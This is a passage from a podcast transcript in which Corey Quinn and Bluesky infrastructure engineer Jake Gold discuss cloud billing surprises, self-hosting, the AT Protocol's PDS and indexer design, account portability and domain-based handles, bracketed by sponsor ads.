And with full Kafka API compatibility, migration is smoother than a fresh jar of peanut butter. Imagine cutting as much as 50% off your AWS bills. With Redpanda, it's not a pipedream, it's reality.

Visit go.redpanda.com/duckbill today.
Redpanda: Because your data infrastructure shouldn't give you Kafkaesque nightmares.

Corey: There are so many weird AWS billing stories that all distill down to you not knowing this one piece of trivia about how AWS works, either as a system, as a billing construct, or as something else. And there's a reason this has become my career of tracing these things down. And sometimes I'll talk to prospective clients, and they'll say, “Well, what if you don't discover any misconfigurations like that in our account?” It's, “Well, you would be the first company I've ever seen where that [laugh] was not true.” So honestly, I want to do a case study if we do.

And I've never had to write that case study, just because it's the tax on not having the forcing function of building in data centers. There's always this idea that in a data center, you're going to run out of power, space, capacity, at some point and it's going to force a reckoning. The cloud has what distills down to infinite capacity; they can add it faster than you can fill it. So, at some point it's always just keep adding more things to it. There's never a let's clean out all of the cruft story. And it just accumulates and the bill continues to go up and to the right.

Jake: Yeah, I mean, one of the things that they've done so well is handle the provisioning part, right, which is kind of what you're getting out there. One of the hardest things in the old days, before we all used AWS and GCP, is you'd have to sort of requisition hardware and there'd be this whole process with legal and financing and there'd be this big lag between the time you need a bunch more servers in your data center and when you actually have them, right, and that's not even counting the time takes to rack them and get them, you know, on network.
The fact that basically, every developer now just gets an unlimited credit card, they can just, you know, use that's hugely empowering, and it's for the benefit of the companies they work for almost all the time. But it is an uncapped credit card. I know, they actually support controls and things like that, but in general, the way we treated it—

Corey: Not as much as you would think, as it turns out. But yeah, it's—yeah, and that's a problem. Because again, if I want to spin up $65,000 an hour worth of compute right now, the fact that I can do that is massive. The fact that I could do that accidentally when I don't intend to is also massive.

Jake: Yeah, it's very easy to think you're going to spend a certain amount and then oh, traffic's a lot higher, or, oh, I didn't realize when you enable that thing, it charges you an extra fee or something like that. So, it's very opaque. It's very complicated. All of these things are, you know, the result of just building more and more stuff on top of more and more stuff to support more and more use cases. Which is great, but then it does create this very sort of opaque billing problem, which I think, you know, you're helping companies solve. And I totally get why they need your help.

Corey: What's interesting to me about distributed social networks is that I've been using Mastodon for a little bit and I've started to see some of the challenges around a lot of these things, just from an infrastructure and architecture perspective. Tim Bray, former Distinguished Engineer at AWS posted a blog post yesterday, and okay, well, if Tim wants to put something up there that he thinks people should read, I advise people generally read it. I have yet to find him wasting my time. And I clicked it and got a, “Server over resource limits.” It's like wow, you're very popular. You wound up getting—got effectively Slashdotted.

And he said, “No, no.
Whenever I post a link to Mastodon, two thousand instances all hit it at the same time.” And it's, “Oh, yeah. The hug of death. That becomes a challenge.” Not to mention the fact that, depending upon architecture and preferences that you make, running a Mastodon instance can be extraordinarily expensive in terms of storage, just because it'll, by default, attempt to cache everything that it encounters for a period of time. And that gets very heavy very quickly. Does the AT Protocol—AT Protocol? I don't know how you pronounce it officially these days—take into account the challenges of running infrastructures designed for folks who have corporate budgets behind them? Or is that really a future problem for us to worry about when the time comes?

Jake: No, yeah, that's a core thing that we talked about a lot in the recent, sort of, architecture discussions. I'm going to go back quite a ways, but there were some changes made about six months ago in our thinking, and one of the big things that we wanted to get right was the ability for people to host their own PDS, which is equivalent to, like, posting a WordPress or something. It's where you post your content, it's where you post your likes, and all that kind of thing. We call it your repository or your repo. But that we wanted to make it so that people could self-host that on a, you know, four or five $6-a-month droplet on DigitalOcean or wherever and that not be a problem, not go down when they got a lot of traffic.

And so, the architecture of AT Proto in general, but the Bluesky app on AT Proto is such that you really don't need a lot of resources. The data is all signed with your cryptographic keys—like, not something you have to worry about as a non-technical user—but all the data is authenticated. That's what—it's Authenticated Transfer Protocol. And because of that, it doesn't matter where you get the data, right?
So, we have this idea of this big indexer that's looking at the entire network called the BGS, the Big Graph Server and you can go to the BGS and get the data that came from somebody's PDS and it's just as good as if you got it directly from the PDS. And that makes it highly cacheable, highly conducive to CDNs and things like that. So no, we intend to solve that problem entirely.

Corey: I'm looking forward to seeing how that plays out because the idea of self-hosting always kind of appealed to me when I was younger, which is why when I met my wife, I had a two-bedroom apartment—because I lived in Los Angeles, not San Francisco, and could afford such a thing—and the guest bedroom was always, you know, 10 to 15 degrees warmer than the rest of the apartment because I had a bunch of quote-unquote, “Servers” there, meaning deprecated desktops that my employer had no use for and said, “It's either going to e-waste or your place if you want some.” And, okay, why not? I'll build my own cluster at home. And increasingly over time, I found that it got harder and harder to do things that I liked and that made sense. I used to have a partial rack in downtown LA where I ran my own mail server, among other things.

And when I switched to Google for email solutions, I suddenly found that I was spending five bucks a month at the time, instead of the rack rental, and I was spending two hours less a week just fighting spam in a variety of different ways because that is where my technical background lives. Being able to not have to think about problems like that, and just do the fun part was great. But I worry about the centralization that that implies. I was opposed to it at the idea because I didn't want to give Google access to all of my mail. And then I checked and something like 43% of the people I was emailing were at Gmail-hosted addresses, so they already had my email anyway. What was I really doing by not engaging with them?
I worry that self-hosting is going to become passe, so I love projects that do it in sane and simple ways that don't require massive amounts of startup capital to get started with.

Jake: Yeah, the account portability feature of AT Proto is super, super core. You can backup all of your data to your phone—the [AT 00:28:36] doesn't do this yet, but it most likely will in the future—you can backup all of your data to your phone and then you can synchronize it all to another server. So, if for whatever reason, you're on a PDS instance and it disappears—which is a common problem in the Mastodon world—it's not really a problem. You just sync all that data to a new PDS and you're back where you were. You didn't lose any followers, you didn't lose any posts, you didn't lose any likes.

And we're also making sure that this works for non-technical people. So, you know, you don't have to host your own PDS, right? That's something that technical people can self-host if they want to, non-technical people can just get a host from anywhere and it doesn't really matter where your host is. But we are absolutely trying to avoid the fate of SMTP and, you know, other protocols. The web itself, right, is sort of… it's hard to launch a search engine because the—first of all, the bar is billions of dollars a year in investment, and a lot of websites will only let us crawl them at a higher rate if you're actually coming from a Google IP, right? They're doing reverse DNS lookups, and things like that to verify that you are Google.

And the problem with that is now there's sort of this centralization with a search engine that can't be fixed. With AT Proto, it's much easier to scrape all of the PDSes, right? So, if you want to crawl all the PDSes out on the AT Proto network, they're designed to be crawled from day one.
It's all structured data, we're working on, sort of, how you handle rate limits and things like that still, but the idea is it's very easy to create an index of the entire network, which makes it very easy to create feed generators, search engines, or any other kind of sort of big world networking thing out there. And then without making the PDSes have to be very high power, right? So, they can do low power and still scrapeable, still crawlable.

Corey: Yeah, the idea of having portability is super important. Question I've got—you know, while I'm talking to you, it's, we'll turn this into technical support hour as well because why not—I tend to always historically put my Twitter handle on conference slides. When I had the first template made, I used it as soon as it came in and there was an extra n in the @quinnypig username at the bottom. And of course, someone asked about that during Q&A.

So, the answer I gave was, of course, n+1 redundancy. But great. If I were to have one domain there today and change it tomorrow, is there a redirect option in place where someone could go and find that on Blue-ski, and oh, they'll get redirected to where I am now. Or is it just one of those 404, sucks to be you moments? Because I can see validity to both.

Jake: Yeah, so the way we handle it right now is if you have a, something.bsky.social name and you switch it to your own domain or something like that, we don't yet forward it from the old .bsky.social name. But that is totally feasible. It's totally possible. Like, the way that those are stored in your what's called your [DID record 00:31:16] or [DID document 00:31:17] is that there's, like, a list that currently only has one item in general, but it's a list of all of your different names, right? So, you could have different domain names, different subdomain names, and they would all point back to the same user.
And so yeah, so basically, the idea is that you have these aliases and they will forward to the new one, whatever the current canonical one is.

Corey: Excellent. That is something that concerns me because it feels like it's one of those one-way doors, in the same way that picking an email address was a one-way door. I know people who still pay money to their ancient crappy ISP because they have a few mails that come in once in a while that are super-important. I was fortunate enough to have jumped on the bandwagon early enough that my vanity domain is 22 years old this year. And my email address still works, which, great, every once in a while, I still get stuff to, like, variants of my name I no longer use anymore since 2005. And it's usually spam, but every once in a blue moon, it's something important, like, “Hey, I don't know if you remember me. We went to college together many years ago.” It's ho-ly crap, the world is smaller than we think.

Jake: Yeah. I mean, I love that we're using domains, I think that's one of the greatest decisions we made is… is that you own your own domain. You're not really stuck in our namespace, right? Like, one of the things with traditional social networks is you're sort of, their domain.com/yourname, right?

And with the way AT Proto and Bluesky work is, you can go and get a domain name from any registrar, there's hundreds of them—you know, we'd like Namecheap, you can go there and you can grab a domain and you can point it to your account. And if you ever don't like anything, you can change your domain, you can change, you know which PDS you're on, it's all completely controlled by you. And there's nearly no way we as a company can do anything to change that.
Like, that's all sort of locked into the way that the protocol works, which creates this really great incentive where, you know, if we want to provide you services or somebody else wants to provide you services, they just have to compete on doing a really good job; you're not locked in. And that's, like, one of my favorite features of the network.

Corey: I just want to point something out because you mentioned oh, we're big fans of Namecheap. I am too, for weird half-drunk domain registrations on a lark. Like, “Why am I poor?” It's like, $3,000 a month of my budget goes to domain purchases, great. But I did a quick whois on the official Bluesky domain and it's hosted at Route 53, which is Amazon's, of course, premier database offering.

But I'm a big fan of using an enterprise registrar for enterprise-y things. Wasabi, if I recall correctly, wound up having their primary domain registered through GoDaddy, and the public domain that their bucket equivalent would serve data out of got shut down for 12 hours because some bad actor put something there that shouldn't have been. And GoDaddy is not an enterprise registrar, despite what they might think—for God's sake, the word ‘daddy' is in their name. Do you really think that's enterprise? Good luck.

So, the fact that you have a responsible company handling these central singular points of failure speaks very well to just your own implementation of these things. Because that's the sort of thing that everyone figures out the second time.

Jake: Yeah, yeah. I think there's a big difference between corporate domain registration, and corporate DNS and, like, your personal handle on social networking. I think a lot of the consumer, sort of, domain registries are—registrars—are great for consumers.
And I think if you—yeah, you're running a big corporate domain, you want to make sure it's, you know, it's transfer locked and, you know, there's two-factor authentication and doing all those kinds of things right because that is a single point of failure; you can lose a lot by having your domain taken. So, I completely agree with you on there.

Corey: Oh, absolutely. I am curious about this to see if it's still the case or not because I haven't checked this in over a year—and they did fix it. Okay. As of at least when we're recording this, which is the end of May 2023, Amazon's Authoritative Name Servers are no longer half at Oracle. Good for them. They now have a bunch of Amazon-specific name servers on them instead of, you know, their competitor that they clearly despise. Good work, good work.

I really want to thank you for taking the time to speak with me about how you're viewing these things and honestly giving me a chance to go ambling down memory lane. If people want to learn more about what you're up to, where's the best place for them to find you?

Jake: Yeah, so I'm on Bluesky. It's invite only. I apologize for that right now. But if you check out bsky.app, you can see how to sign up for the waitlist, and we are trying to get people on as quickly as possible.

Corey: And I will, of course, be talking to you there and will put links to that in the show notes. Thank you so much for taking the time to speak with me. I really appreciate it.

Jake: Thanks a lot, Corey. It was great.

Corey: Jake Gold, infrastructure engineer at Bluesky, slash Blue-ski. I'm Cloud Economist Corey Quinn and this is Screaming in the Cloud.
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an angry comment that will no doubt result in a surprise $60,000 bill after you posted.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.